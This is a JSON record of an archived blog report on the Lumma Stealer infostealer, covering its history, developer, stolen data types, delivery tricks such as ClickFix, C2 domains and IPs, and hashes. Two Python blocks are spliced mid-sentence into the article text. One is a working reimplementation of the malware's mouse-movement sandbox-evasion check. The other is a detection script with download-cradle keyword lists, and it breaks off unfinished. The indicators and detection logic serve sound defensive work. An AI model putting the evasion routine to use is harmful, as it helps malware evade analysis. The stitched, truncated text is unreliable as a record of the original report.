{
	"id": "2863db3c-7c5c-42eb-a860-984c0d567ba4",
	"created_at": "2026-04-06T00:06:16.988255Z",
	"updated_at": "2026-04-10T03:37:09.071748Z",
	"deleted_at": null,
	"sha1_hash": "446997379ebdfde8c75fcafaa57cbefc97fc6ef4",
	"title": "Lumma Stealer — A Proliferating Threat in the Cybercrime Landscape",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 509401,
	"plain_text": "Lumma Stealer — A Proliferating Threat in the Cybercrime Landscape\r\nBy BeGoodToAll\r\nPublished: 2025-07-26 · Archived: 2026-04-05 19:38:30 UTC\r\nPress enter or click to view image in full size\r\nExecutive Summary: Lumma Stealer, also recognized as LummaC2, Lummac, or simply Lumma, stands as one of the most\r\nprominent and rapidly evolving information stealer threats within the global cybersecurity landscape. Functioning under a\r\nMalware-as-a-Service (MaaS) model, it empowers cybercriminals of varying technical proficiencies to execute\r\nsophisticated data theft operations with relative ease. The malware’s continuous development, incorporation of advanced\r\nevasion techniques, and utilization of diverse distribution vectors have contributed significantly to its widespread adoption\r\nand market dominance. This poses substantial financial, reputational, and operational risks to both individuals and\r\norganizations across numerous critical infrastructure sectors. Although recent coordinated takedown initiatives by\r\ninternational law enforcement and private sector partners have successfully disrupted its infrastructure, the underlying threat\r\npersists as operators inevitably seek to rebuild or enhance their capabilities.\r\nIntroduction: Information stealers are a category of malware specifically designed to covertly gather and exfiltrate sensitive\r\ndata from compromised devices. Historically, they have represented a persistent threat, with early notable variants like ZeuS\r\nemerging as far back as 2006, and have progressively evolved in sophistication and prevalence. Lumma Stealer epitomizes\r\nthis evolution, offering an accessible yet highly potent tool for cybercriminals to acquire a wide range of valuable\r\ninformation, spanning from login credentials and financial details to cryptocurrency wallets and personally identifiable\r\ninformation. 
This comprehensive report delves into Lumma Stealer’s origins, its developmental timeline, core operational\r\ncharacteristics (Tactics, Techniques, and Procedures — TTPs), the key threat actors involved, its impact on the broader\r\ncybercrime ecosystem, and concludes with strategic observations and actionable mitigation recommendations.\r\nHistory of Lumma Stealer: Lumma Stealer, recognized by its various aliases including LummaC2, Lummac, and Lumma,\r\nis a highly sophisticated information-stealing malware strain. It was first observed in the security community around\r\nAugust 2022 and has maintained an active presence, being advertised and sold on various underground forums and\r\nTelegram channels since its inception.\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 1 of 8\n\nEvolution Stages and Timeline: Since its initial appearance in 2022, Lumma Stealer has undergone significant and\r\nfrequent development, incorporating new updates and versions aimed at continuously enhancing its capabilities and\r\nevading detection. Microsoft Threat Intelligence has documented up to six distinct versions of Lumma Stealer, each\r\nprimarily focused on refining anti-antivirus techniques and introducing changes to its Command and Control (C2)\r\ncommunication protocols and data formats.\r\n2022:\r\nAugust: Lumma Stealer is first observed within the cybersecurity community.\r\nLate 2022 / December: LummaC2 is formally established and marketed as a Malware-as-a-Service (MaaS) offering,\r\nsold through underground forums. 
Its initial price point is around $250.\r\n2023:\r\nJanuary-April: Darktrace observes and investigates multiple instances of Lumma Stealer activity across its customer\r\nbase, with prominent activity noted in EMEA and the US, including confirmed data exfiltration.\r\nFebruary: A specific spear-phishing campaign targets a South Korean streamer, impersonating Bandai Namco to\r\ndeliver Lumma Stealer.\r\nAugust: LummaC2 is offered at a discounted rate during a subscription sale, indicating a structured business model.\r\nSeptember: A new update is released by its developers, promising infrastructure and stability improvements. Silent\r\nPush identifies over 150 new Lumma C2 Indicators of Compromise (IOCs) through advanced behavioral\r\nfingerprinting and content similarity scans. LummaC2 v4.0 begins incorporating Control Flow Flattening\r\nobfuscation into its default builds.\r\nNovember: The developer, “Shamel,” publicly states in an interview that he has approximately “400 active clients”.\r\nReports emerge detailing LummaC2 v4.0’s novel anti-sandbox technique, which leverages trigonometry to detect\r\nhuman mouse activity, thereby delaying its malicious payload detonation if no human interaction is detected.\r\nNovember 2023 — May 2025: A joint advisory incorporates IOCs gathered from LummaC2 malware infections\r\nduring this period.\r\nLate 2023/Early 2024: LummaC2 developers move their data exfiltration from plaintext HTTP to HTTPS in order\r\nto bypass network-based detection controls. 
They also begin leveraging Cloudflare services to\r\nenhance the resilience and availability of their exfiltration infrastructure.\r\n2024:\r\nApril-June: More than 21,000 market listings selling LummaC2-obtained logs are observed, representing a 71.7%\r\nincrease compared to the same period in 2023.\r\nH1-H2: ESET telemetry records a 369% increase in detections of Lumma Stealer from the first half to the\r\nsecond half of 2024.\r\nJune: The Chilean National Computer Security Incident Response Team (CSIRT) reports a significant surge in\r\nLumma Stealer distribution via phishing emails, deceptive websites, and “ClickFix” techniques. ESET Research\r\nidentifies Lumma Stealer targeting players of the popular Hamster Kombat mobile clicker game through malicious\r\nGitHub repositories disguised as helpful automation tools.\r\nJuly: SecurityHQ analysts observe Lumma Stealer’s global impact across multiple industries, including IT, media,\r\nand manufacturing.\r\nOctober: The Cyber Express highlights a campaign where Lumma Stealer, in conjunction with the Amadey Bot,\r\nspecifically targets the manufacturing industry through phishing and malicious downloads. LummaC2 gains\r\nsignificant popularity after the October 2024 takedown of the RedLine and Meta stealers during “Operation\r\nMagnus,” creating a noticeable void in the infostealer market.\r\nNovember: Red Canary publishes insights into LummaC2’s “paste-and-run” social engineering tactic.\r\nDecember: A LummaC2 threat is detailed, involving a fake CAPTCHA paste-and-run lure that leads to the execution\r\nof an encoded PowerShell script. LummaC2 version 4.0 is submitted to the Malware Bazaar database.\r\nThroughout 2024: LummaC2 developers continuously integrate new features to maintain their competitive edge in\r\nthe stealer market. This includes implementing functionality to send stolen information piecemeal during exfiltration,\r\nensuring data theft even if the malware’s operation is interrupted. 
They also rapidly adopt new techniques to acquire\r\nbrowser cookies and bypass Application-Bound Encryption (ABE) in Chromium browsers.\r\n2025:\r\nJanuary: In an interview, the developer behind Lumma expresses an intent to cease operations by the following fall,\r\na statement which security researchers advise viewing with skepticism given continued observed activity.\r\nMarch: Microsoft Threat Intelligence identifies a phishing campaign impersonating online travel agency\r\nBooking.com, utilizing Lumma Stealer for financial fraud and theft. Lumma Stealer’s presence on dark web\r\nmarketplaces and Telegram channels continues its growth, boasting over a thousand active subscribers.\r\nMarch 16 — May 16: Microsoft identifies over 394,000 Windows computers globally infected by Lumma\r\nmalware. Concurrently, Alphatechs’ Sphere platform analyzes 881,387 compromised systems from March 20 to May\r\n20, with Lumma Stealer accounting for 242,091 infections (27.5% of the total), indicating its significant prevalence.\r\nMay 13 / May 21 / May 22: Microsoft’s Digital Crimes Unit (DCU), in a landmark operation coordinated with\r\ninternational law enforcement agencies (including Europol’s European Cybercrime Center (EC3), the U.S.\r\nDepartment of Justice, and Japan’s Cybercrime Control Center (JC3)), disrupts Lumma Stealer’s infrastructure. This\r\nextensive action involves the seizure of approximately 2,300 malicious domains (over 1,300 by Microsoft, with\r\n300 actioned by law enforcement supported by Europol) and the disruption of critical Command and Control (C2)\r\ninfrastructure. The U.S. 
Federal Bureau of Investigation (FBI) attributes around 10 million infections to Lumma, and\r\nEuropol describes it as the “world’s most significant infostealer threat”.\r\nMay: A detailed case study highlights an email campaign targeting Canadian organizations, utilizing fake\r\nattachments with harmful PowerShell scripts to deploy hidden payloads. A notable advancement in this specific\r\nvariant is the implementation of a registry-based persistence mechanism, allowing the malware to survive system\r\nreboots.\r\nFuture Predictions: Experts anticipate that Lumma variants will continue to become more sophisticated, evasive, and even\r\neasier to deploy. Expected shifts include more robust persistence mechanisms, heavier use of fileless execution and\r\nobfuscated PowerShell scripts, and a potential expansion into a Ransomware-as-a-Service (RaaS) model. Evasion\r\ntechniques are projected to integrate Artificial Intelligence (AI) and Machine Learning (ML) to bypass antivirus and achieve\r\nreal-time evasion. Furthermore, the scope of targeted data may expand to include biometric authentication data, cloud access\r\ntokens, and financial APIs, further endangering enterprise systems.\r\nWhy it’s So Successful and its Impact on the Stealer Ecosystem and Dominance: Lumma Stealer’s remarkable success\r\nand prominent dominance within the cybercrime landscape are attributable to a combination of strategic and technical\r\nfactors:\r\nMalware-as-a-Service (MaaS) Model: Lumma is extensively sold through a sophisticated MaaS model on\r\nunderground forums and Telegram channels, democratizing access to powerful malware for cybercriminals regardless\r\nof their technical expertise. This model significantly lowers the barrier to entry for launching complex and profitable\r\ncyberattacks.\r\nHigh Success Rate: Lumma is highly effective in successfully infiltrating systems and exfiltrating sensitive data\r\nwithout immediate detection. 
Its stealthy operational nature allows it to siphon information covertly, multiplying the\r\npotential damage it can inflict.\r\nContinuous Development and Updates: The malware’s developers, primarily “Shamel,” consistently release\r\nupdates and new versions. This agility ensures that Lumma remains difficult to detect, often bypassing host-based\r\ndetection rules implemented for older variants. This includes proactive adaptation to new security measures, such as\r\nGoogle’s Application-Bound Encryption (ABE) in Chromium browsers.\r\nUser-Friendliness and Active Support: Lumma offers an intuitive user interface, comprehensive documentation,\r\nand active customer support, making it highly attractive to a wide spectrum of threat actors, from seasoned criminals\r\nto amateur operators.\r\nExceptional Adaptability and Evasion: Lumma is engineered to swiftly adapt to new environments and capitalize\r\non current trends, using lures themed around AI tools and software cracks. It employs advanced obfuscation methods\r\n(e.g., LLVM-based obfuscation passes, Control Flow Flattening, customized control flow indirection), memory injection,\r\nfileless execution techniques, and anti-analysis checks (including detecting debuggers and analysis environments) to circumvent\r\ntraditional antivirus tools and sandbox environments. A particularly sophisticated technique in v4.0 involves using\r\ntrigonometry to track mouse movements, delaying payload activation until genuine human activity is detected.\r\nResilient Infrastructure: Its distribution and Command and Control (C2) infrastructure are designed for dynamic\r\nresilience, continually rotating malicious domains, exploiting ad networks, and leveraging legitimate cloud services\r\n(such as Cloudflare) to evade detection and maintain operational continuity. 
It employs multi-tiered C2 architectures\r\nwith robust fallback mechanisms via Steam profiles and Telegram channels.\r\nComprehensive Data Targeting: Lumma Stealer is capable of targeting and extracting a vast array of sensitive data,\r\nrendering it an extremely valuable commodity in the cybercriminal underground. This stolen data includes:\r\nCredentials saved in web browsers (e.g., Google Chrome, Microsoft Edge, Mozilla Firefox and other Gecko-based browsers,\r\nBrave, Opera), including auto-fill data and password caches. It specifically targets the os_crypt.encrypted_key value in\r\nChromium’s Local State file, the DPAPI-protected key needed to decrypt the saved-password and cookie databases.\r\nCookies, which enable attackers to hijack user sessions and bypass multi-factor authentication (MFA).\r\nSensitive files containing financial information, secret keys (including cloud keys), 2FA backup codes, server\r\npasswords, and cryptocurrency private keys and wallet data (e.g., .txt, .pdf, .docx, .rtf files). It actively scans for\r\nspecific keywords such as seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt.\r\nPersonal data like ID numbers, addresses, medical records, credit card numbers, and dates of birth.\r\nCryptocurrency wallets and browser extensions associated with popular services like MetaMask, Binance,\r\nElectrum, Ethereum, Exodus, Coinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nData from remote access tools and password managers, specifically AnyDesk and KeePass.\r\nTwo-factor authentication (2FA) tokens and extensions such as Authenticator, Authy, EOS Authenticator, GAuth\r\nAuthenticator, and Trezor Password Manager.\r\nInformation from VPNs (.ovpn files), various email clients (Gmail, Outlook, Yahoo), and FTP clients.\r\nSystem metadata, including CPU information, operating system version (Windows 7 to Windows 11), system locale,\r\ninstalled applications, username, hardware ID, and screen resolution, useful for profiling victims or tailoring 
future\r\nexploits. It can also capture screenshots.\r\nMarket Dominance: LummaC2 was identified as the most prevalent infostealer in 2023 by ReliaQuest. The\r\nnumber of LummaC2-obtained logs available for sale experienced a 110% increase from Q3 to Q4 2023. SpyCloud\r\nreported an astounding 2000% increase in unique LummaC2 malware records, comprising nearly a quarter of its\r\nweekly ingest by identified variant. Furthermore, Lumma Stealer’s exfiltrated logs are significantly larger, averaging\r\nalmost three times the size of comparable logs from other prominent infostealers like RedLine, Vidar, and Raccoon.\r\nIts ascendancy was partly propelled by the takedown of competing stealers, RedLine and Meta, creating a market\r\nvoid that Lumma rapidly filled. Lumma has also been observed as a significant component in attacks against critical\r\ninfrastructure sectors, including manufacturing, telecommunications, logistics, finance, and healthcare.\r\nThreat Actor Associated with the Lumma Stealer: The primary developer of Lumma Stealer is based in Russia and\r\noperates under the internet alias “Shamel”. Shamel is also known to use the aliases “Lumma” and “LummaC2”.\r\nMicrosoft Threat Intelligence tracks the individual responsible for the development and maintenance of the Lumma malware\r\nand its associated infrastructure under the designation Storm-2477. The malware is additionally associated with the actor\r\ngroup Angry Likho. Shamel actively markets different subscription tiers for Lumma via Telegram and various other\r\nRussian-language chat forums. 
As of November 2023, Shamel claimed to have approximately 400 active clients utilizing his\r\nservice.\r\nTactics, Techniques, and Procedures (TTPs): Lumma Stealer leverages a complex and continually evolving infection\r\nchain, distinguished by its multi-vector delivery strategies and highly sophisticated evasion techniques.\r\nInitial Access (Delivery Methods):\r\nPhishing Emails: This remains a primary infection vector. Threat actors send malicious attachments or embedded\r\nlinks in emails, often impersonating well-known brands (e.g., Booking.com, Microsoft) or services to create a sense\r\nof urgency. These emails direct victims to cloned legitimate-looking websites or malicious servers that subsequently\r\ndeploy the Lumma payload. Specifically, spear-phishing attachments and hyperlinks are frequently employed.\r\nMalvertising: Adversaries place malicious sponsored advertisements in search engine results, particularly targeting software-related queries such as “Notepad++ download” or “Chrome update.” Clicking these poisoned links diverts users to\r\ncloned websites that mimic legitimate vendors but deliver Lumma Stealer instead.\r\nTrojanized Applications / Cracked Software: Lumma binaries are commonly bundled with compromised or pirated\r\nversions of popular legitimate applications (e.g., ChatGPT, Vegas Pro, VLC, Mp3tag) and then distributed through\r\nfile-sharing platforms or “webhards”. These modified installers are designed to execute the malware silently after the\r\nlegitimate software installation completes.\r\nDrive-by Downloads on Compromised Websites: Threat actors compromise legitimate websites, often exploiting\r\nspecific vulnerabilities or misconfigurations. They then insert malicious JavaScript into the site content. 
When\r\nunsuspecting users visit these modified sites, the JavaScript executes, leading to the direct delivery of a payload, an\r\nintermediary script, or presenting further lures to trick users into performing an action.\r\nAbuse of Legitimate Services and ClickFix: Public code repositories like GitHub are misused to host malicious\r\nscripts and binaries, often disguised as legitimate development tools or utilities. A particularly deceptive method\r\ninvolves fake CAPTCHA pages commonly found within the “ClickFix” ecosystem. Targets are social-engineered\r\ninto pasting malicious commands into the Windows Run dialog (Win+R) under the false pretense of passing a verification\r\ncheck. These commands frequently use Base64-encoded PowerShell to download and execute Lumma directly in memory,\r\namong other stealthy delivery chains.\r\nDropped by Other Malware: Lumma Stealer is often delivered as a secondary payload by other initial access\r\nloaders and malware families, including DanaBot, Amadey Bot, RedLine Stealer, PrivateLoader, and HijackLoader.\r\nExecution \u0026 Evasion Techniques:\r\nObfuscation: The malware’s core binary is heavily obfuscated using advanced protection methods such as LLVM-based\r\nobfuscation passes, Control Flow Flattening (CFF), Control Flow Obfuscation, customized stack\r\ndecryption, large stack variables, and dead code insertion, making static analysis extremely challenging. It also\r\nemploys custom obfuscation techniques to mask stolen data during network transmission. Newer versions of\r\nLummaC2 (LUMMAC.V2) leverage customized control flow indirection to manipulate program execution,\r\neffectively thwarting reverse engineering tools like IDA Pro and Ghidra.\r\nAnti-Analysis/Anti-Sandbox: Lumma incorporates sophisticated anti-analysis and detection evasion techniques.\r\nLummaC2 v4.0 notably introduces an advanced anti-sandbox mechanism that utilizes trigonometry to track mouse\r\nmovements. 
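The anti-sandbox check described here can be reproduced as a small function. The block below is an added example written for this report, not code from the page or from the malware: it takes cursor positions sampled at fixed intervals (the Windows sampling loop around GetCursorPos() is assumed, not shown), rejects a cursor that has not moved between samples, computes the angle between each pair of consecutive movement vectors from the dot product, and treats the host as human-driven only when every turn stays below the 45-degree threshold the report cites. The cursor traces at the bottom are constructed, not captured data. For a defender the point is that a sandbox has to emulate smooth, continuous mouse movement rather than a parked or teleporting cursor, or the payload stays dormant and the sample looks benign.

```python
import math

# Threshold the report cites for LummaC2 v4.0: consecutive movement vectors must turn by
# less than this many degrees for the cursor to count as human-driven.
MAX_TURN_DEGREES = 45.0


def turn_angle(v1, v2):
    # Angle in degrees between two movement vectors, via the dot product.
    dot = v1[0] * v2[0] + v1[1] * v2[1]
    norm = math.hypot(*v1) * math.hypot(*v2)
    cos = max(-1.0, min(1.0, dot / norm))
    return math.degrees(math.acos(cos))


def looks_human(samples, max_turn=MAX_TURN_DEGREES):
    # samples: cursor positions taken at fixed intervals, e.g. five GetCursorPos() calls a few
    # hundred milliseconds apart (the sampling loop is assumed, not shown here).
    # A sandbox with a parked cursor fails the first test; a scripted cursor that jumps
    # between corners or reverses direction fails the second.
    if len(samples) < 3:
        return False
    for a, b in zip(samples, samples[1:]):
        if a == b:
            return False          # cursor did not move between two samples
    vectors = [(b[0] - a[0], b[1] - a[1]) for a, b in zip(samples, samples[1:])]
    for v1, v2 in zip(vectors, vectors[1:]):
        if turn_angle(v1, v2) >= max_turn:
            return False          # sharp turn: not a smooth hand movement
    return True


# Constructed cursor traces (not captured data).
HUMAN_DRAG = [(100, 100), (140, 120), (185, 143), (230, 170), (280, 195)]
PARKED_CURSOR = [(512, 384)] * 5
SCRIPTED_SQUARE = [(100, 100), (300, 100), (300, 300), (100, 300), (100, 100)]
SCRIPTED_WIGGLE = [(100, 100), (110, 100), (100, 100), (110, 100), (100, 100)]

if __name__ == '__main__':
    for name, trace in [('human drag', HUMAN_DRAG), ('parked cursor', PARKED_CURSOR),
                        ('scripted square', SCRIPTED_SQUARE), ('scripted wiggle', SCRIPTED_WIGGLE)]:
        print(name, '->', 'detonate' if looks_human(trace) else 'stay dormant')
```

The square and wiggle traces show why a sandbox's generic "move the mouse a bit" routine is not enough: every turn in them is 90 or 180 degrees, so they are rejected just like a parked cursor, while the gently curving drag passes with all turns under 5 degrees.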
The malware will only proceed with its full payload if significant human activity (angles between\r\nconsecutive cursor movements lower than a predefined threshold, e.g., 45 degrees) is detected, thereby evading\r\nanalysis in automated sandbox environments. It is also known to inject malicious code into legitimate Windows\r\nprocesses to further hide its activity.\r\nUse of Legitimate Tools: The malware frequently employs legitimate Windows tools such as PowerShell and CMD\r\nfor execution to bypass traditional antivirus detections. PowerShell scripts are particularly used for silent launching\r\nof the infection chain.\r\nDLL Side-loading: Lumma Stealer has been observed to use DLL side-loading with vulnerable or cracked software,\r\nexemplified by a trojanized Mp3tag.exe that loads a malicious Lumma Stealer DLL.\r\nInformation Stealing Capabilities:\r\nLumma Stealer targets a comprehensive and evolving set of user data. Instructions for target credentials are often\r\nspecified in a dynamic configuration file retrieved from the C2 server, allowing for flexible targeting.\r\nCredentials: Extracts saved passwords, auto-fill data, and password caches from a wide range of web browsers\r\nincluding Google Chrome, Microsoft Edge, Mozilla Firefox, other Gecko-based browsers, Brave, and Opera. It specifically\r\nsteals the os_crypt.encrypted_key value from Chromium’s Local State file, which, once unprotected with DPAPI, decrypts\r\nthe saved credential and cookie databases.\r\nCookies: Steals session cookies from browsers, enabling attackers to hijack user sessions and potentially bypass two-factor authentication (2FA).\r\nFiles: Harvests files containing financial information, secret keys (including cloud keys), 2FA backup codes, server\r\npasswords, and cryptocurrency private keys and wallet data. It systematically collects files from user profiles and\r\ncommon directories, prioritizing .pdf, .docx, or .rtf extensions. 
It also actively scans for files containing specific\r\nkeywords like seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt.\r\nPersonal Data: Includes ID numbers, addresses, medical records, credit card numbers, and dates of birth.\r\nCryptocurrency Wallets \u0026 Extensions: Actively searches for wallet files, browser extensions, and local keys\r\nassociated with a wide range of cryptocurrency services such as MetaMask, Binance, Electrum, Ethereum, Exodus,\r\nCoinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nOther Applications: Targets data from various Virtual Private Networks (VPNs) (specifically .ovpn files), email\r\nclients (e.g., Gmail, Outlook, Yahoo), FTP clients, remote desktop software (e.g., AnyDesk), password managers\r\n(e.g., KeePass), and Telegram applications.\r\nSystem Metadata: Collects detailed host telemetry, including CPU information, operating system version\r\n(compatible with Windows 7 through Windows 11), system locale, installed applications, username, hardware ID,\r\nand screen resolution. This information is often used for victim profiling or tailoring subsequent exploits. The\r\nmalware can also capture screenshots of the infected system.\r\nData Exfiltration:\r\nAll stolen information is typically organized and gathered into multiple ZIP files, which are then transmitted one by\r\none to the Command and Control (C2) server.\r\nCommunication with the C2 server is predominantly performed over HTTP or HTTPS POST requests carrying obfuscated\r\ndata, often disguised as legitimate network traffic to avoid detection. Commonly observed URI paths for these requests\r\ninclude /api and /c2sock, and a distinct user agent string, “TeslaBrowser/5.5,” is often used.\r\nRecent evasive techniques include embedding exfiltration routines directly within PowerShell commands,\r\neffectively creating fileless methods. 
Additionally, the malware has begun abusing legitimate cloud-based services\r\nlike Telegram for data exfiltration, sending stolen data through seemingly benign communication platforms to\r\nreduce the likelihood of triggering security alerts.\r\nA significant evolution in its exfiltration routine involves sending information piecemeal, as each category is collected,\r\nrather than gathering all data before sending. This makes the malware more resilient, allowing for partial logs to be\r\nexfiltrated even if the malware is detected or stopped mid-execution.\r\nPersistence Mechanisms:\r\nWhile earlier versions of LummaC2 were considered non-persistent (exiting after data exfiltration), recent variants\r\nhave introduced registry-based persistence. This mechanism allows the malware to survive system reboots and\r\nremain active on infected machines, typically by creating an entry in the Windows Registry’s Run key (e.g.,\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run). LummaC2’s overall effectiveness is partly attributed\r\nto its focus on establishing system persistence, which enables it to await further payloads or commands.\r\nCommand and Control (C2) Communication:\r\nLumma Stealer establishes communication with its C2 servers to retrieve its targeting configuration and to exfiltrate\r\nstolen data.\r\nThe C2 infrastructure is characterized by its dynamic and resilient nature, constantly rotating malicious domains and\r\nactively leveraging legitimate cloud services to maintain operational continuity and evade detection.\r\nIt employs a multi-tiered C2 infrastructure, which includes a set of frequently changing Tier-1 domains hard-coded\r\ninto the malware’s configuration. 
It also utilizes fallback C2s hosted on seemingly innocuous platforms such as\r\nSteam profiles and Telegram channels, which then redirect to the primary Tier-1 C2s.\r\nObserved C2 domains include reinforcenh[.]shop, stogeneratmns[.]shop, fragnantbui[.]shop, drawzhotdog[.]shop,\r\nvozmeatillu[.]shop, offensivedzvju[.]shop, ghostreedmnu[.]shop, gutterydhowi[.]shop, Predatowpmn[.]shop,\r\nFileworId[.]shop, pang-scrooge-carnage[.]shop, Preachstrwnwjw[.]shop, Complainnykso[.]shop,\r\nshepherdlyopzc[.]shop, languagedscie[.]shop, unseaffarignsk[.]shop, celebratioopz[.]shop, warrantelespsz[.]shop,\r\ndefenddsouneuw[.]shop, callosallsaospz[.]shop, covvercilverow[.]shop, liernessfornicsa[.]shop,\r\ndeallerospfosu[.]shop, indexterityszcoxp[.]shop, futureddospzmvq[.]shop, crowdstrike-office365[.]com,\r\ncomplaintsipzzx[.]shop, erorblackday[.]xyz, curtainjors[.]fun, starblack[.]fun, and solve.gevaq[.]com.\r\nAssociated C2 IP addresses include 89.187.169[.]3, 146.19.128[.]68, 195.123.226[.]91, 144.76.173[.]247,\r\n184.30.21[.]171, 104.26.2[.]16, 188.114.96[.]3, 45.9.74[.]78, 77.73.134[.]68, 82.117.255[.]127,\r\n82.117.255[.]80, 82.118.23[.]50.\r\nExfiltration traffic from the malware to the C2 server is typically fire-and-forget: the malware does not depend on a\r\nresponse to continue, although its targeting configuration is fetched from the C2 at startup.\r\nGeneral IOCs:\r\nHashes: Specific SHA1 and SHA256 hashes of LummaC2 samples are provided. 
Examples include\r\nafdefcd9eb251202665388635c0109b5f7b4c0a5,\r\na9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab,\r\ne264ba0e9987b0ad0812e5dd4dd3075531cfe269, 128a085b84667420359bfd5b7bad0a431ca89e35,\r\n99b8464e2aabff3f35899ead95dfac83f5edac51, 9f3651ad5725848c880c24f8e749205a7e1e78c1,\r\na01fa9facf3a13c5a9c079d79974842abff2a3f2, f2c37ad5ca8877186c846b6dfb2cb761f5353305,\r\nf89f91e33bf59d0a07dfb1c4d7246d74a05dd67d,\r\naca54f9f5398342566e02470854aff48c53659be0c0cb83d3ce1fd05430375f8,\r\n865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4,\r\n1e06ef09d9e487fd54dbb70784898bff5c3ee25d87f468c9c5d0dfb8948fb45c,\r\n280900902df7bb855b27614884b369e5e0da25ff22efacc59443a4f593ccd145,\r\n2856b7d3948dfb5231056e52437257757839880732849c2e2a35de3103c64768,\r\n3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7,\r\n277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf,\r\nb97965e4a793ec0fa10abc86d0c6be5718716d8a, 9ac88b93fee8f888cabc3d0c9d81507c6dad7498,\r\n2c11592f527a35c3dac75139e870dd062b12dfe1, c43316ddcb51e143ab53f996587c23ea4985f6ea,\r\nd932ee10f02ea5bb60ed867d9687a906f1b8472f01fc5543b06f9ab22059b264\r\nC2 Domains and IP Addresses: The extensive lists of observed C2 domains and IP addresses (detailed in the\r\n“Command and Control (C2) Communication” section above) can be incorporated into network-based detection\r\nrules.\r\nURLs: Malicious URLs used for distribution or C2 communication, such as hxxp://ebalkayiu[.]fun/api,\r\nhxxps://1july[.]com/rMKNqt3S,\r\nhxxps://download2361.mediafire[.]com/kz5hd3dkenwgED02vBaT_kwGFdmwQ1iAY4QGf3SAcLidcmbEn-K1HrKyPpR6ADOq7VjezmdEoNhZJFB_Wze08J1MU0iH_oPWGS6Myj12LuXef9l7y_Em63yxedx88ezRHTt44POY858wKHjwxqr2errwIunSIH\r\n2023_Setup.rar, https[:]//win15.b-cdn[.]net/win15.txt, https[:]//win15.b-cdn[.]net/win15.zip, and\r\nhttps://steamcommunity[.]com/profiles/76561199724331900 can be used to craft rules for web proxies and network\r\nintrusion detection systems.\r\nUser Agents: The unique 
HTTP User-Agent string “TeslaBrowser/5.5” observed during C2 communication is a\r\nstrong indicator for network detection.\r\nRegistry Entries: The creation of specific persistence entries in the Windows Registry, particularly within the\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run key, can be monitored.\r\nFile Paths: Monitoring for downloads to specific hidden folders under the user’s AppData directory (e.g., [User\r\nProfile]\\AppData\\Roaming\\bFylC6zX.zip, C:\\Users\\[User]\\AppData\\Roaming\\7oCDTWYu\\Set-up.exe) and the\r\ncreation of specific files for stolen data like “System.txt” or files in “Important Files/Profile” for .txt files, can be\r\neffective.\r\nProcess Behavior: Detection rules can target unusual HTTP POST requests originating from wininet.dll, suspicious\r\nfile access patterns to browser credential files, and the creation of files matching wallet/browser patterns (e.g.,\r\nkey4.db, logins.json, dp.txt). The invocation of mshta.exe and powershell.exe to download and execute payloads is a\r\nkey process-level indicator.\r\nObfuscated Strings: The specific obfuscated pattern string used by LummaC2 for its Chrome DLL memory searcher\r\n(9sdmLrTRuOE8????p4UMZQLB????jl7CKwIeGWvwDe3YvXN40wd763ssw7Cx????kdamAY3?PdE????6J????\r\n7Qy6S04NP0R????k70a?oAj7a3????????K3smA????maSd?3l4) could be used in file-based or memory-based Yara\r\nrules.\r\nBehavioral Detection: Given Lumma’s advanced evasion, behavioral detection is paramount. Endpoint Detection\r\nand Response (EDR) solutions, such as Microsoft Defender, are recommended for their ability to provide effective\r\nprotection by alerting system users and preventing malware processes during the early stages of an attempted attack.\r\nContinuous monitoring of network activity with Network Intrusion Detection/Prevention Systems (NIDS/NIPS) and a\r\nTLS-inspecting web proxy or secure web gateway that blocks known C2 destinations adds a network layer; a Web Application\r\nFirewall (WAF) protects web applications rather than endpoints and is not a control against infostealer exfiltration. 
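The network and host indicators in this section translate directly into detection logic. The block below is an added example written for this report (not code from the page or from any vendor) serving both the paste-and-run description under Initial Access and the IOCs above: it re-arms four of the defanged C2 domains listed earlier, matches the /api and /c2sock POST paths and the TeslaBrowser/5.5 User-Agent against constructed proxy log lines, and checks constructed process-creation events for the ClickFix shape (a PowerShell or mshta.exe child of explorer.exe, an -EncodedCommand argument decoded from Base64/UTF-16LE, and download-cradle keywords). The pipe-separated log format, the event field names, the lure.example host and the cradle keyword list are this example's assumptions.

```python
import base64

# Network indicators taken from the report's General IOCs section (defanged there, re-armed here).
# Only four of the listed C2 domains are included; extend the set from the full list above.
C2_DOMAINS = {'reinforcenh.shop', 'stogeneratmns.shop', 'drawzhotdog.shop', 'crowdstrike-office365.com'}
C2_PATHS = {'/api', '/c2sock'}
C2_USER_AGENT = 'TeslaBrowser/5.5'

# Host indicators: the living-off-the-land binaries the report names, the spellings PowerShell
# accepts for -EncodedCommand, and download-cradle keywords (the keyword list is this example's own).
LOLBINS = {'powershell.exe', 'pwsh.exe', 'mshta.exe'}
ENC_FLAGS = {'-e', '-ec', '-en', '-enc', '-encodedcommand'}
CRADLE_WORDS = ('iex', 'invoke-expression', 'iwr', 'invoke-webrequest', 'downloadstring',
                'frombase64string', 'http://', 'https://')


def parse_proxy_line(line):
    # Constructed pipe-separated proxy log format (an assumption of this example):
    # timestamp|client_ip|method|url|status|user_agent
    ts, client, method, url, status, ua = line.strip().split('|')
    rest = url.split('://', 1)[1] if '://' in url else url
    host, _, path = rest.partition('/')
    return {'ts': ts, 'client': client, 'method': method.upper(),
            'host': host.split(':')[0].lower(), 'path': '/' + path, 'ua': ua}


def check_proxy_line(line):
    # Returns the names of the indicators that matched; an empty list means no match.
    ev = parse_proxy_line(line)
    hits = []
    if ev['host'] in C2_DOMAINS:
        hits.append('c2-domain')
    if ev['ua'] == C2_USER_AGENT:
        hits.append('c2-user-agent')
    # /api and /c2sock exist on plenty of legitimate sites, so only a POST to one of them
    # counts, and on its own it is a weak signal to correlate rather than alert on.
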